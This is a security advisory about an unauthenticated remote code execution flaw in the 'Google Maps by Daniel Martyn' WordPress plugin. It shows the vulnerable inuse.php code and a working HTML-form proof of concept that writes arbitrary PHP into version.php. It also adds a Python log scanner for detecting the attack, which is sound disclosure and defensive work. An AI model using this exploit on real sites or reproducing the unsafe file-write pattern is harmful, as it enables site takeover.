One of the things we do to make sure our customers have the best data on vulnerabilities in WordPress plugins is to monitor third party data on hacking attempts. Through that we recently came across a request for a file, /wp-content/plugins/google-maps-by-daniel-martyn/js/gmbdm.js, from the plugin Google Maps by Daniel Martyn. That plugin is no longer in the WordPress Plugin Directory, which could have been due to it being removed for a security issue.
In looking over the plugin for what a hacker might be interested in, we quickly found a remote code execution vulnerability in it. The file /inuse.php contains the following code:
// Unauthenticated: no capability check, no nonce, and the request body is trusted as-is.
$inuse = $_POST['checkinuse'];

// Open version.php inside the plugin directory for writing (truncating it).
$infile = fopen($_SERVER['DOCUMENT_ROOT'] . '/wp-content/plugins/google-maps-by-daniel-martyn/version.php', 'w');

// Strip backslashes, then encode and immediately decode HTML entities, which leaves the
// original input effectively unchanged before it is written to a .php file.
$inuse = str_replace('\\', '', $inuse);
$inuse = htmlentities($inuse);
fwrite($infile, html_entity_decode($inuse));
fclose($infile);
echo $inuse;
That code takes the value of the POST input “checkinuse” and saves it to a file named version.php in the plugin’s directory. Through that, malicious code can be loaded into a file with a .php extension, which would allow the code to execute.
Proof of Concept
The following proof of concept will place the specified PHP code into the file version.php in the directory /wp-content/plugins/google-maps-by-daniel-martyn/.
Make sure to replace “[path to WordPress]” with the location of WordPress and “[PHP code]” with the PHP code you want in the uploaded file.
<html>
<body>
<form action="http://[path to WordPress]/wp-content/plugins/google-maps-by-daniel-martyn/inuse.php" method="POST">
<input type="hidden" name="checkinuse" value="[PHP code]" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
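For site owners checking whether this plugin was targeted, here is an added example (not part of the original post) that scans web server access logs for the request sequence described above: the probe for gmbdm.js, the POST to inuse.php that rewrites version.php, and a later request for version.php itself. The log lines, IP addresses and timestamps are constructed for the example; the log format is Apache combined format.

```python
import re

# Constructed Apache combined-format log lines for this example (IPs, times
# and user agents are invented); line 1 is a probe, 2 the file write, 3 the fetch.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2018:12:00:01 +0000] "GET /wp-content/plugins/google-maps-by-daniel-martyn/js/gmbdm.js HTTP/1.1" 404 210 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2018:12:00:03 +0000] "POST /wp-content/plugins/google-maps-by-daniel-martyn/inuse.php HTTP/1.1" 200 35 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2018:12:00:05 +0000] "GET /wp-content/plugins/google-maps-by-daniel-martyn/version.php HTTP/1.1" 200 12 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Mar/2018:12:01:00 +0000] "GET /wp-login.php HTTP/1.1" 200 1500 "-" "Mozilla/5.0"
"""

PLUGIN_DIR = "/wp-content/plugins/google-maps-by-daniel-martyn/"
# Request stages from the advisory: probing for the plugin, the unauthenticated
# POST that rewrites version.php, and a later fetch of the rewritten file.
SIGNATURES = [("GET", "js/gmbdm.js", "probe"),
              ("POST", "inuse.php", "file-write"),
              ("GET", "version.php", "execute")]
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

def parse_line(line):
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def classify(entry):
    """Map a parsed request to an attack stage, or None if it is unrelated."""
    path = entry["path"].split("?", 1)[0]          # ignore any query string
    if not path.startswith(PLUGIN_DIR):
        return None
    rest = path[len(PLUGIN_DIR):]
    for method, suffix, stage in SIGNATURES:
        if entry["method"] == method and rest == suffix:
            return stage
    return None

def scan_log(text):
    """Return {ip: [stages in order]} for every client that touched the plugin."""
    findings = {}
    for line in text.splitlines():
        entry = parse_line(line)
        stage = classify(entry) if entry else None
        if stage:
            findings.setdefault(entry["ip"], []).append(stage)
    return findings

def likely_exploited(findings):
    """IPs that wrote version.php and then requested it: treat the site as compromised."""
    return [ip for ip, stages in findings.items()
            if "file-write" in stages and "execute" in stages[stages.index("file-write"):]]
```

Any POST to inuse.php from an unexpected client is worth investigating on its own; a following request for version.php is the signal that whatever was written has been executed, so version.php should be inspected and the plugin removed.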